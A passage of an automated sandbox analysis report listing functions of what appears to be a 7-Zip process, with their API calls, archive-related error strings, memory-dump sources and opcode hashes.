                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                                                            • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                                                            • Instruction ID: 83d99ba6c37f81f06fd39b1432ac2b0ff1aa33407fa63b802491b6af55063b39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D02B4075088086DB106FBF5CC13780083A718721FD01539DDDBC6302E8188CC9626A
                                                                                                                                                                                                                                                                            Function 00663314 Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2162964266-0
                                                                                                                                                                                                                                                                            • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                                                            • Instruction ID: 5ac090c14474fd567cb5b8fdc41a517571c993fa520ca1d3b55302a4155b24c9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03D0A7A67406C887CA04AF27D69151DA322DF8DFD5708D0289F090BB0ACE30CCE5CB44
                                                                                                                                                                                                                                                                            Function 006689D8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 006689EA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                                                            • Instruction ID: 3a744db16103fc43af0c77622a9d91045eaa53d0e2ebbc223fe1a8324f948a2a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90D0A77270194480DB251FBEC8403741362A765B74F184310D9B04B3D0DF2589D68702
                                                                                                                                                                                                                                                                            Function 0066CDF4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                                                            • Instruction ID: 08e2157522c0ce15ab8233786c91c82425a2eb37c8d3b92974de978a69174a87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1C08C91782A4802CA49222F2F9A37C42130F9BBE1E4C40209F880BB92DA5688E28704

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 0066F1B4 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 318COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-798110030
                                                                                                                                                                                                                                                                            • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                                                            • Instruction ID: 01151c04ff6cad31fab90c1e51501b7440b4b759158bd06ce95494b2951c3582
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CC18E72218A4086CB50EF11F8907AEB762F7D6B90F941135EB8B53B68DF39C846CB45
                                                                                                                                                                                                                                                                            Function 00692578 Relevance: 45.3, APIs: 36, Instructions: 335COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                                                            • Instruction ID: 61cf6f8cbb80db8756a560075968a7234f1520f68fc6ee8f28fb48561b724180
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7D14C76209AC581CF70DF21E460AAEB76AF7CAB84F025046DB9E67B55CE38C845CB04
                                                                                                                                                                                                                                                                            Function 006A66A8 Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 131libraryloadertimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                                                                                                                                                            • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 600854398-319139910
                                                                                                                                                                                                                                                                            • Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                                                                                                                                                            • Instruction ID: 5adcf32d0e46bb1605cfc9b58efcae3769f8761214824a9af03d1cb62e72fcac
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551C6B5301A8181EF60EF95F8507A97362F78AB80F48402AEE4E43765EF3DC959CB15
                                                                                                                                                                                                                                                                            Function 006A3528 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 472stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                                                                                                                                                            • String ID: data:
                                                                                                                                                                                                                                                                            • API String ID: 527563900-3222861102
                                                                                                                                                                                                                                                                            • Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                                                                                                                                                                                                                            • Instruction ID: 7562e7eb4043c11386d6cfdf4f962a9e437ba131e56cdd3c4d660324d42f957e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12021332208A9187DB50EF25E4907AE7763F796788F445015FA8A47768DF39CE4ACF40
                                                                                                                                                                                                                                                                            Function 0069FA0C Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 489COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0069FAAC
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0069FAC0
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0069FC43
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                              • Part of subcall function 0069F820: _CxxThrowException.MSVCRT ref: 0069F88D
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A0031
                                                                                                                                                                                                                                                                              • Part of subcall function 0069F8B8: memmove.MSVCRT ref: 0069F91E
                                                                                                                                                                                                                                                                              • Part of subcall function 0069F8B8: free.MSVCRT ref: 0069F926
                                                                                                                                                                                                                                                                              • Part of subcall function 0069F93C: memmove.MSVCRT ref: 0069F992
                                                                                                                                                                                                                                                                              • Part of subcall function 0069F93C: free.MSVCRT ref: 0069F99A
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A00EA
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A00F2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A0101
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A010A
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A0113
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A0121
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 006A0184
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Duplicate filename on disk:, xrefs: 0069FCB4
                                                                                                                                                                                                                                                                            • Duplicate filename in archive:, xrefs: 006A0149
                                                                                                                                                                                                                                                                            • Internal file name collision (file on disk, file in archive):, xrefs: 006A015D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                                                                                            • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                                                                                            • API String ID: 3338823681-819937569
                                                                                                                                                                                                                                                                            • Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                                                            • Instruction ID: 3da6ec9d520ef1b63163b0551947e1b9b49f56ae4ea6710caad2c4da5b5bc917
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB12B373218A8486CB60DF25E44069EB7A6F389B90F515625EF9E87F58CF38D891CF04
                                                                                                                                                                                                                                                                            Function 0067AF58 Relevance: 11.7, APIs: 9, Instructions: 447COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                                                                                            • Instruction ID: 6e3f6158d6b7bcf19ae447fbe9bee4886304a112060bcea89e338327cc175d17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09027132309B8186DB60DF25E4903AEB362F7C5B84F549126DB8E57B69DF78C845CB04
                                                                                                                                                                                                                                                                            Function 00668F18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32 ref: 00668F7A
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32 ref: 0066905E
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32 ref: 006690B5
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32 ref: 006690F6
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetModuleHandleW.KERNEL32 ref: 0066ABD1
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetProcAddress.KERNEL32 ref: 0066ABE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0066AC32
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                                                            • String ID: ($:
                                                                                                                                                                                                                                                                            • API String ID: 4250411929-4277925470
                                                                                                                                                                                                                                                                            • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                                                            • Instruction ID: a7fa63668ca1e1fd63fa7a77e79b744fcf48860afd8ee56259c50a9736350ba8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B51C033608BC196CB30DF60F05079EB76AF386758F54852ADB8907B58EB39C4A5CB64
                                                                                                                                                                                                                                                                            Function 0066881C Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$DriveLogicalStrings
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 837055893-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                                                                                            • Instruction ID: fffe8094c5693c5365d1684826931daf42e14379a4f28327daae55ef982c33be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6431B562705B414ADB70EF36E86136AA253BB86BE8F4843389F5D57384DF38C946C345
                                                                                                                                                                                                                                                                            Function 006696AC Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006696D1
                                                                                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00669723
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32 ref: 0066976C
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00669779
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00669796
                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 006697C4
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006697CD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2572579059-0
                                                                                                                                                                                                                                                                            • Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                                                                                            • Instruction ID: e3afad3fd660a8cd3adadd2ddbdaea51520168f4f9a5bb03fa1fd608f7b0f54c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F31A432215E408AC770AF11F95036AF766E786BE0F584225EFE947B95DE39C4918704
                                                                                                                                                                                                                                                                            Function 006ADBA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Version$AddressHandleModuleProc
                                                                                                                                                                                                                                                                            • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 2268189529-2102062458
                                                                                                                                                                                                                                                                            • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
